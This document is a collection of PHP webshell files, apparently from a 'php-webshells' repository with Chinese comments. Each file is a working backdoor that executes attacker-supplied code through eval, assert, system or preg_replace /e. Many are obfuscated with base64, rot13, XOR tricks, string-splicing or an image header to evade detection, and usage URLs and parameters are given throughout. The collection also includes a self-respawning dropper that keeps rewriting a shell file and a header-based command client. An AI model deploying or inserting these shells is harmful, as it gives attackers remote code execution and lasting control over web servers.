
eval.php
1
|
<?php @eval($_POST['cmd'])?>
|
assert.php
1
|
<?php assert($_POST[cmd]);?>
|
min_lenth.php
1
2
|
<?=
$_GET[1];//<?=
* ; |
get_get.php
1
2
3
4
5
|
<?php
//?a=assert&b=phpinfo();
@$_GET[a](@$_GET[b]);
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
?>
|
get_post.php
1
2
3
4
5
|
<?php
//?2=system POST:1=whoami
//2=assert 1=phpinfo();
($_=@$_GET[2]).@$_($_POST[1])//?2=assert 1
?>
|
post_post.php
1
2
3
4
5
6
|
<?php
//a=assert&b=phpinfo();
//a=system&b=ipconfig
@$_POST['a'](@$_POST['b']);
//<O>a=assert</O>
?>
|
request_ab.php
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?php
//?a=system&b=dir
//?a=assert&b=phpinfo();
//?a=assert&b=eval($_POST['pass'])
//POST:
// a=assert&b=phpinfo();
// a=system&b=whoami
//GET:
// http://127.0.0.1/fuckdun/yjh_2.php?a=assert&b=phpinfo();
//phpinfo(); == fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29;
//生成 c.php <?php @eval($_POST[c]);
$_REQUEST['a']($_REQUEST['b']);
?>
|
document-write.php
1
2
3
4
5
6
7
8
9
10
|
<?php
$root= $_SERVER['DOCUMENT_ROOT'];
$shelladdr = $root.'/shell.php';
$shellcontent = '<?php @eval($_POST["cmd"]);?>';
file_put_contents($shelladdr,$shellcontent);
//http://127.0.0.1/write_shell.php?cmd=file_put_contents("a.txt","w");
//http://127.0.0.1/write_shell.php?cmd=fwrite(fopen("a.txt","w"),"aa");
//$a = @$_GET['cmd'];
//@eval($a);
?>
|
script.php
1
|
<script language="php">@eval($_POST['cmd']);</script>
|
include.php
1
2
3
4
|
<?php
$filename=$_GET['id'];
include ($filename);
?>
|
require.php
1
2
3
4
|
<?php
if($_POST['token'] == 'xxoo'){
require 'flag.png';//phpinfo();
}
|
stripslashes.php
1
2
3
4
|
<?php
$content=stripslashes($_POST[1]);
eval($content);
?>
|
config.php
1
2
3
4
|
<?php
${"func"}= substr(__FILE__, -10, -4);
${"config"} = @$_GET[config];
@$func($config);
|
$_POST[cmd].php
1
2
3
4
5
6
7
|
<?php
${"function"}= substr(__FILE__, -15, -4);
${"config"} = assert;
$config($function);
//$func = @$_POST[cmd];
//assert($function);
//assert($_POST[cmd]);
|
hard_brute.php
1
2
3
4
5
6
7
|
<?php
//"shell" md5: 2591c98b70119fe624898b1e424b5e91
//substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['hihack']);
//var_dump(substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91');
//substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91'&&system('whoami');
substr(md5(@$_GET['x']),28)=='5e91'&&@eval($_POST['md5']);
?>
|
no_assert.php
1
2
3
4
5
6
7
8
9
10
11
|
<?
//${"function"}= substr(__FILE__, -14, -4);
$a=md5('ssss');
$b=substr($a,2,2)+37;
$s=$b+18;
$e=substr($a,-7,1);
$r=$s-1;
$t=$r+2;
$z=chr($b).chr($s).chr($s).$e.chr($r).chr($t);
$z($_GET['cmd']);
?>
|
accept_language.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
<?php
/*
Tamper Data 修改Accept-Language:whoami / ipconfig
import requests
URL = 'http://127.0.0.1/fuckdun/php-webshells-master/accept_language.php'
while True:
command=raw_input("~$ ")
head = {'Accept-Language':command}
try:
req = requests.get(URL,headers=head)
print req.content
except Exception as e: print e
*/
//echo passthru(@$_GET['a']);
//echo getenv("HTTP_ACCEPT_LANGUAGE");
echo passthru(getenv("HTTP_ACCEPT_LANGUAGE"));
?>
|
apply_filters.php
1
2
3
4
5
6
7
8
9
10
11
|
<?php
class Parse_Args {
public function apply_filters($key) {
assert($key);
}
}
//?xxoo=phpinfo();
@extract($_REQUEST);
$reflectionMethod = new Parse_Args();
$reflectionMethod -> apply_filters($xxoo);
?>
|
create_function.php
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?php
//http://127.0.0.1/create_function.php?c=1;}phpinfo();/*
$id = @$_GET['c'];
$res = 'echo '.$id.'is'.$a.";";
$cf = create_function('$a', $res);
/*
function anonymous($a){
echo 1;}phpinfo();/*.'is'.$a;
//$id.'is'.$a;
}
anonymous($a);
*/
?>
|
invoke_cmd.php
1
2
3
4
|
<?php
$s = new ReflectionFunction("assert");
@$s -> invoke($_POST["cmd"]);
?>
|
array.php
1
2
3
4
5
|
<?php
item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['jssj'])
?>
|
array_flip.php
1
2
3
4
5
6
7
8
|
<?php
$args = 1;
$arr=array("n;}$_REQUEST[c];/*"=>"test");
$arr1=array_flip($arr); // array("test"=>"n;}$_REQUEST[c];/*");
//var_dump($arr1);die(); //array(1) { ["test"]=> string(15) "n;}phpinfo();/*" }
$arr2 = $arr1[test]; // n;}$_REQUEST[c];/*
//var_dump($arr2);die(); // string(15) "n;}phpinfo();/*"
create_function('$args',$arr2); // 1,n;}$_REQUEST[c];/
|
array_map.php
1
2
3
4
5
6
7
8
|
<?php
if($_GET[session] == 'xxoo'){
@array_map($_GET['xx'],(array)base64_decode($_REQUEST['oo']));
exit();
}
//?session=xxoo&xx=assert
//post:oo=cGhwaW5mbygpOw==
?>
|
array_walk_base64.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
<?php
//http://127.0.0.1/fuckdun/yjh_10.php?_exit=cHJlZ19maWx0ZXI=
//POST: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$ad = '|';$ad .='.';$ad .='*|';$ad .='e';
$_clasc = base64_decode(@$_GET['_exit']);//base64_decode($_REQUEST['_exit']); ->preg_replace 或preg_filter
$arr = array(base64_decode(@$_POST['mcontent']) => $ad,); //$arr = array('phpinfo()' => '|.*|e')
@array_walk($arr, $_clasc, ''); //preg_replace('|.*|e',phpinfo(),'')
/*
//www=preg_replace&wtf=phpinfo();
$e = $_REQUEST['www'];
$arr = array(@$_POST['wtf'] => '|.*|e',);
@array_walk($arr, $e, '')
//http://127.0.0.1/fuckdun/yjh_12.php?_exit=cHJlZ19yZXBsYWNl==
//post: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$Base = "base6"."4"."_decod"."e";
$_clasc = $Base(@$_REQUEST['_exit']);
$arr = array($Base(@$_POST['mcontent']) => '|.*|e',);
@array_walk($arr, $_clasc, '');
*/
?>
|
base64_assert.php
1
2
3
4
5
6
|
<?php
error_reporting(0);
set_time_limit(0);
$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");
$a(@${"_P"."O"."S"."T"}[xw]);
?>
|
str_replace.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
<?php
$gn="J3Nhb3Nhb";
$alq="ydidKiTisg";
$obk="IEBldimFsIC";
$lub = str_replace("q","","qsqtqrq_replqace");
$cqs="gkX1BPU1Rb";
$hox = $lub("v", "", "vbasev6v4_vdvevcovdve");
$trx = $lub("ci","","ciccircieciacitcie_cifciucinciccitiocin");
$ots = $trx('', $hox($lub("i", "", $obk.$cqs.$gn.$alq))); $ots();
/*
$uf="snc3"; //pass is sqzr
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw)));
$mpy();
*/
/*
$mt="mFsKCleRfU";
$ojj="IEBleldle";
$hsa="E9TVFsnd2VuJ10p";
$fnx="Ow==";
$zk = str_replace("d","","sdtdrd_redpdldadcde");
$ef = $zk("z", "", "zbazsze64_zdzeczodze");
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
$zvm();
*/
?>
|
preg_replace.php
1
|
<?php @preg_replace("/[copyright]/e",$_POST['c'],"error");?>
|
preg_replace_post.php
1
2
3
4
5
6
7
|
<?php
//[@eval(base64_decode($_POST[z0]));]
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
|
preg_replace_post_base64.php
1
2
3
4
5
6
7
8
9
|
<?php
//eval(base64_decode($_POST[z0]))
//POST: gbtv=a&z0=cGhwaW5mbygpOw== phpinfo();
//<O>gbtv=@eval_r($_POST[1])</O>
if(@$_POST['gbtv']){
$_="b"/**/."ase64_decode";
preg_replace("/^/e",$_("ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFt6MF0pKQ=="),0);
}
?>
|
preg_rot13.php
1
2
3
|
JFIF<?php
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
?>
|
preg_rot13_post.php
1
|
<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');?>
|
assert_item.php
1
2
3
4
5
6
7
8
|
<?php
//?_=assert&__=eval($_POST['pass'])
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
|
lambda.php
1
2
3
4
5
6
7
|
<?php
//function __lambda_func(){@eval($_POST['f']);}
$s = "F9QivT1NUWyd";$v = "QGivV2YivWwoJ";$j = "mJ10pOw=iv=";
$re = str_replace("iv","","sivtr_ivrepivlaivce");
$ba = $re("nf","","bnfanfse6nf4_nfdecnfode");
$fun = $re("vf","","cvfreavfte_fvfunctvfion");
$vi = $fun("",$ba($re("iv","",$v.$s.$j)));$vi();?>
|
urldecode.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
$cc.=urldecode("%".substr($GuTou,$i,2));
@eval($cc);
exit;
}
//Hex2phpinfo();gutou=706870696E666F28293B
//gutou=406576616C2028245F504F53545B2778275D293B&x=phpinfo();
//whoami:73797374656D2877686F616D69293B
/*
//http://127.0.0.1/222.php?cc=706870696E666F28293B 执行phpinfo()
//把phpinfo();转换成URL格式去掉%得706870696E666F28293B
//
//http://127.0.0.1/222.php?cc=406576616C2028245F504F53545B2778275D293B
//密码x
if(@$_REQUEST["cc"]){
$c=@$_REQUEST["cc"];
$c=str_replace(array("\n","\t","\r"),"",$c);
$buf="";for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
$FiLi=Create_Function("",$buf);$FiLi();exit;
}
*/
?>
|
xor.php
1
2
3
4
5
6
7
8
9
|
<?php
@$_++;
$__=("#"^"|");
$__.=("."^"~");
$__.=("/"^"
" );$__.=("|"^"/");
$__.=("{"^"/");
${$__}[!$_](${$__}[$_]);//$_POST[0]($_POST[1]);0=assert&1=phpinfo();
?>
|
1
2
3
4
5
|
<?php
//360
${("#"^"|").("#"^"|")}=("!"^"").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");
${("#"^"|").("#"^"|")}(@("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));
?>
|
usort.php
1
2
3
4
|
<?php
//php version>=5.6 usort(...$_GET);//?1[]=1-1&1[]=eval($_GET[x])&2=assert&x=phpinfo();
usort($_GET,'asse'.'rt');//usort.php?1=1+1&2=eval($_GETT[x])&x=phpinfo();
?>
|
foreach.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
<?php
//str1
session_start();
define("Emmm","诡道");
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
foreach ($$_request as $_key=>$_value)
{
$$_key= $_value;
}
}
@$userinfo['userinfo'] = $username;
@$userinfo["password"] = $password;
@$_SESSION["userinfo"] = $userinfo;
$userinfo = $_SESSION["userinfo"];
eval('$title='.$str1.';');
?>
|
special-ope.php
1
2
3
4
5
6
7
8
9
10
11
12
|
<?php
//http://127.0.0.1/fuckdun/yjh_4_2.php?0=system&1=whoami
//http://127.0.0.1/fuckdun/yjh_4_2.php?0=assert&1=phpinfo();
$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
?>
|
never_kill.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
<?php
ignore_user_abort(true);
//error_reporting(0);
set_time_limit(0);
$k = '$_POST["#"]';
$s = <<<EOF
<?php @eval({$k});?>
EOF;
while(true)
{
if(!file_exists("killme.php")){
file_put_contents("killme.php","$s");
}
ob_flush();
flush();
sleep(1);
ob_end_flush();
}
/*
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
//file_put_contents(__FILE__,'');
while(1){
file_put_contents('/var/www/test/webshell.php','<?php @eval($_POST["password"]);?>');
}
?>
*/
|
spe_encode.php
特殊格式见附件:
1
2
3
4
5
6
7
8
9
10
|
<?php
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=assert&__=phpinfo();
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=assert&__=eval($_POST[1])
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=system&__=whoami
$_="";
$_[+""]='';
@$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php @${'_'.$_}['_'](@${'_'.$_}['__']);?>
|